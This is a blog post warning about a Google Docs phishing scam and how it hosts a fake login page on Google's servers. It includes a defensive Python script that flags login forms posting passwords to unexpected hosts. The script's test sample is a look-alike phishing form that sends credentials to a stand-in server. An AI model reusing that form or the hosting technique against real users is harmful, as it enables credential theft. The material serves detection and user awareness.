Warning: A Google Docs email phishing scam is making the rounds.
Recipients are being sent an email with the word “Documents” as the subject – and when opened, users are prompted to view an “important” Google Drive document. If you click on the link, be prepared to land on a webpage that looks almost identical to the Google Drive login page where you’ll be asked to enter your username and password.
With the Google logo, slogan, and icons, the fraud login page looks strikingly similar to the real deal. Can you tell if the Google login page below is real or an impostor?
The photo is of a fraudulent Google login page. Since the phishing site doesn’t recognize actual Google user info, we’ve found that one easy way to spot a fraud link is to check for your account photo (depending on whether you have cookies enabled). The fraudulent Google Drive site has no access to your account settings, so its login page looks generic – sans photo or email address.
But it gets even trickier: The fake page is actually hosted on Google’s servers, so a Google address appears in the address bar after the phishing link is clicked, making the page seem more convincing. The scammers do this by uploading a document into their public folder in Google Drive and using the preview feature to obtain a publicly accessible link. These types of email phishing scams are becoming increasingly advanced (e.g. the recent Netflix scam and the Target data breach) – and more difficult to spot.
When users log in to the fake Google Drive site, their username and password are sent to a compromised web server before they are redirected to an actual Google doc. Though you may not notice anything suspicious, this simple login could have hefty consequences for your bank account: scammers can make purchases on Google Play for apps and content, and gain access to your Google+ account and Google Docs along with your Gmail account.
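The tell-tale sign in the flow above is that a page served from a trusted host submits the password somewhere else. The following script is an added example written for this post (not Barracuda’s or Google’s code) that parses a sign-in page, finds every form containing a password field, and flags any form whose resolved submit target is outside an allowlist of expected authentication hosts. The sample pages, the `EXPECTED_AUTH_HOSTS` allowlist and the `.invalid` hostnames and placeholder path are all constructed for illustration.

```python
"""Flag login forms that would post credentials outside the expected identity provider.

Added example for this post, not Barracuda's or Google's code. The HTML below is
constructed to mimic the described scenario (a look-alike sign-in page served from a
trusted file-hosting URL that posts the password to an unrelated server). The
EXPECTED_AUTH_HOSTS allowlist is an assumption a defender would maintain.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hosts where a genuine Google sign-in form is allowed to submit credentials
# (assumed allowlist for this example).
EXPECTED_AUTH_HOSTS = {"accounts.google.com"}


class LoginFormParser(HTMLParser):
    """Collect each <form> together with whether it contains a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of {"action": str, "has_password": bool}
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)    # attribute values may be None for bare attributes
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def find_credential_leaks(page_url, html, expected_hosts=EXPECTED_AUTH_HOSTS):
    """Return the submit hosts of every password form that posts outside expected_hosts.

    Relative actions are resolved against page_url, so a form with action="" on a
    page served from a trusted host is treated as posting back to that host.
    """
    parser = LoginFormParser()
    parser.feed(html)
    parser.close()
    suspicious = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        target = urlparse(urljoin(page_url, form["action"]))
        host = (target.hostname or "").lower()
        if host not in expected_hosts:
            suspicious.append(host)
    return suspicious


# Constructed sample: look-alike sign-in page served from a file-hosting preview URL
# (placeholder path) whose form sends the password to an unrelated server.
FAKE_PAGE_URL = "https://drive.example-host.invalid/preview/PLACEHOLDER_DOC_ID"
FAKE_PAGE_HTML = """
<html><body>
<img src="google-logo.png" alt="Google">
<form method="post" action="http://compromised-server.invalid/collect.php">
  <input type="text" name="Email">
  <input type="password" name="Passwd">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

# Constructed sample of a form that posts back to the expected host (relative action).
REAL_PAGE_URL = "https://accounts.google.com/signin"
REAL_PAGE_HTML = """
<form method="post" action="/signin">
  <input type="text" name="Email">
  <input type="password" name="Passwd">
</form>
"""

if __name__ == "__main__":
    print("fake page posts credentials to:", find_credential_leaks(FAKE_PAGE_URL, FAKE_PAGE_HTML))
    print("real page posts credentials to:", find_credential_leaks(REAL_PAGE_URL, REAL_PAGE_HTML))
```

The check deliberately keys on the form’s resolved destination rather than the address in the bar, because, as the post explains, the bar is exactly what this scam gets right. A mail gateway or browser extension could run the same logic on fetched landing pages to surface look-alike login forms for review.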
Luis Chapetti, Barracuda Engineer and Researcher, weighed in on the phishing attack:
“While this is not a new threat in the email security landscape, it is important to take note that spammers always revert back to doing what works. This Google Doc technique works. Users should be vigilant and always remember not to click on any embedded link in emails. Instead, open up a new browser and type in the link directly.”
Google has also released an update stating that it has removed the phishing pages and is working diligently to prevent this spoof from happening again. The Google team suggests resetting your password if you have any suspicion of a personal data breach.
To avoid becoming a victim of an email phishing attack, refrain from clicking on links or attachments in messages from unrecognized senders and never enter your password in a location that seems sketchy.